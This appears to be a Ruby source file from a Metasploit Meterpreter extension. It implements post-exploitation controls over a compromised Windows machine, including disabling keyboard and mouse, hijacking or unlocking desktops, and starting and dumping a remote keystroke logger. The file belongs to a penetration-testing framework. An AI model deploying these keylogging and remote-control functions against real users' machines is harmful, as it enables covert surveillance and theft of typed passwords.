Files
metasploit-gs/lib/rex/post/meterpreter/extensions/stdapi/ui.rb
T
HD Moore 89ecdd9ac8 Mostly working setdesktop code, removed grabdesktop
git-svn-id: file:///home/svn/framework3/trunk@6393 4d416f70-5f16-0410-b530-b9f4589650da
2009-03-25 23:14:14 +00:00

169 lines
3.1 KiB
Ruby

#!/usr/bin/env ruby
require 'rex/post/ui'
module Rex
module Post
module Meterpreter
module Extensions
module Stdapi
###
#
# Allows for interacting with the user interface on the remote machine,
# such as by disabling the keyboard and mouse.
#
# WARNING:
#
# Using keyboard and mouse enabling/disabling features will result in
# a DLL file being written to disk.
#
###
class UI < Rex::Post::UI
include Rex::Post::Meterpreter::ObjectAliasesContainer
##
#
# Constructor
#
##
#
# Initializes the post-exploitation user-interface manipulation subsystem.
#
def initialize(client)
self.client = client
end
##
#
# Device enabling/disabling
#
##
#
# Disable keyboard input on the remote machine.
#
def disable_keyboard
return enable_keyboard(false)
end
#
# Enable keyboard input on the remote machine.
#
def enable_keyboard(enable = true)
request = Packet.create_request('stdapi_ui_enable_keyboard')
request.add_tlv(TLV_TYPE_BOOL, enable)
response = client.send_request(request)
return true
end
#
# Disable mouse input on the remote machine.
#
def disable_mouse
return enable_mouse(false)
end
#
# Enable mouse input on the remote machine.
#
def enable_mouse(enable = true)
request = Packet.create_request('stdapi_ui_enable_mouse')
request.add_tlv(TLV_TYPE_BOOL, enable)
response = client.send_request(request)
return true
end
#
# Returns the number of seconds the remote machine has been idle
# from user input.
#
def idle_time
request = Packet.create_request('stdapi_ui_get_idle_time')
response = client.send_request(request)
return response.get_tlv_value(TLV_TYPE_IDLE_TIME);
end
#
# Hijack the input desktop
#
def grab_input_desktop
request = Packet.create_request('stdapi_ui_grab_input_desktop')
response = client.send_request(request)
return true
end
#
# List desktops
#
def enum_desktops
request = Packet.create_request('stdapi_ui_enumdesktops')
response = client.send_request(request)
return response.get_tlv_values(TLV_TYPE_STRING)
end
#
# List desktops
#
def set_desktop(name="WinSta0\\Default")
request = Packet.create_request('stdapi_ui_set_desktop')
request.add_tlv(TLV_TYPE_DESKTOP, name)
response = client.send_request(request)
return true
end
#
# Unlock or lock the desktop
#
def unlock_desktop(unlock=true)
request = Packet.create_request('stdapi_ui_unlock_desktop')
request.add_tlv(TLV_TYPE_BOOL, unlock)
response = client.send_request(request)
return true
end
#
# Start the keyboard sniffer
#
def keyscan_start
request = Packet.create_request('stdapi_ui_start_keyscan')
response = client.send_request(request)
return true
end
#
# Stop the keyboard sniffer
#
def keyscan_stop
request = Packet.create_request('stdapi_ui_stop_keyscan')
response = client.send_request(request)
return true
end
#
# Dump the keystroke buffer
#
def keyscan_dump
request = Packet.create_request('stdapi_ui_get_keys')
response = client.send_request(request)
return response.get_tlv_value(TLV_TYPE_KEYS_DUMP);
end
protected
attr_accessor :client # :nodoc:
end
end; end; end; end; end